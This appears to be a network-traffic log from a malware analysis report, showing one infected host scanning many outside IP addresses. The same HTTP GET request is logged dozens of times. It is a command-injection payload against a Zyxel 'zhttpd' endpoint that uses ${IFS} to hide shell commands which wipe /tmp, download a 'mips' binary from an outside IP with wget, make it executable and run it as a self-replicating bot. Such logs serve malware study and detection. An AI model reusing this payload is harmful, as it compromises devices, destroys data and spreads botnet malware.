                              Mar 31, 2024 08:41:35.957503080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5481192.168.2.1347876120.169.29.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957556009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5482192.168.2.1340124107.192.163.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957580090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5483192.168.2.1345748200.220.69.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957627058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5484192.168.2.134970613.45.141.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957683086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5485192.168.2.1358742151.206.108.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957735062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5486192.168.2.1342664142.189.28.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957765102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5487192.168.2.135577260.202.220.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957801104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5488192.168.2.1337978175.43.41.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957833052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5489192.168.2.1341524177.117.180.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957865000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5490192.168.2.1345860157.234.224.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957895041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5491192.168.2.1353372121.96.52.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957940102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5492192.168.2.135791478.130.86.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957968950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5493192.168.2.1350580164.189.222.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958036900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5494192.168.2.134935275.113.132.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958082914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5495192.168.2.1350276173.86.209.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958137989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5496192.168.2.1338130198.25.54.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958192110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5497192.168.2.135620027.12.168.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958245993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5498192.168.2.135045820.216.48.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958297968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5499192.168.2.1357302118.234.173.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958348989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5500192.168.2.1341384182.185.67.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958389044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5501192.168.2.133775475.73.66.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958442926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5502192.168.2.1359164222.51.155.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958492041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5503192.168.2.136080897.232.172.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958549023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5504192.168.2.1348358200.3.246.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958581924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5505192.168.2.134716453.198.0.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958641052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5506192.168.2.135382866.250.90.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958684921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5507192.168.2.1347706186.145.116.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958714008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5508192.168.2.134178887.92.53.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958776951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5509192.168.2.1336340168.17.176.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958825111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5510192.168.2.135155067.63.191.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958867073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5511192.168.2.134066439.215.90.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958908081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5512192.168.2.1357040157.123.132.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958952904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5513192.168.2.1338280137.60.19.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.958977938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5514192.168.2.1352618153.217.97.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959022999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5515192.168.2.1360506169.241.162.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959063053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5516192.168.2.1360590190.31.29.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959106922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5517192.168.2.133815258.75.43.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959160089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5518192.168.2.1334298143.6.202.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959196091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5519192.168.2.13392524.20.204.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959249973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5520192.168.2.134423845.118.235.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959286928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5521192.168.2.1338560157.68.101.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959340096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5522192.168.2.13583168.69.21.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959381104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5523192.168.2.1347182200.187.112.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959445000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5524192.168.2.134350275.47.205.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959510088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5525192.168.2.1350308150.63.144.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959537029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5526192.168.2.1360992145.90.178.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959564924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5527192.168.2.133966050.141.250.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959615946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5528192.168.2.1344020131.220.222.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959680080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5529192.168.2.1346208201.242.247.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959698915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5530192.168.2.1353984174.118.180.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959742069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5531192.168.2.1356800140.39.84.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959795952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5532192.168.2.1343438113.40.139.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959845066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5533192.168.2.1359380143.228.117.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959892988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5534192.168.2.134632267.100.199.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959950924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5535192.168.2.135605049.252.82.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.959969997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5536192.168.2.1335868211.30.1.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960002899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5537192.168.2.133777684.228.112.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960048914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5538192.168.2.1353604206.228.32.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960086107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5539192.168.2.1333480196.57.48.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960139990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5540192.168.2.135369252.123.203.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960195065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5541192.168.2.1348918185.15.149.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960232019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5542192.168.2.1340314220.44.45.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960277081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5543192.168.2.1334286130.229.44.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960328102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5544192.168.2.1341810184.190.238.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960365057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5545192.168.2.135512068.38.124.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960393906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5546192.168.2.1341182128.171.143.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960489988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5547192.168.2.1334550115.69.230.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960515022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5548192.168.2.1360752174.182.122.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960545063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5549192.168.2.1332886219.214.134.87443
                              TimestampBytes transferredDirectionData
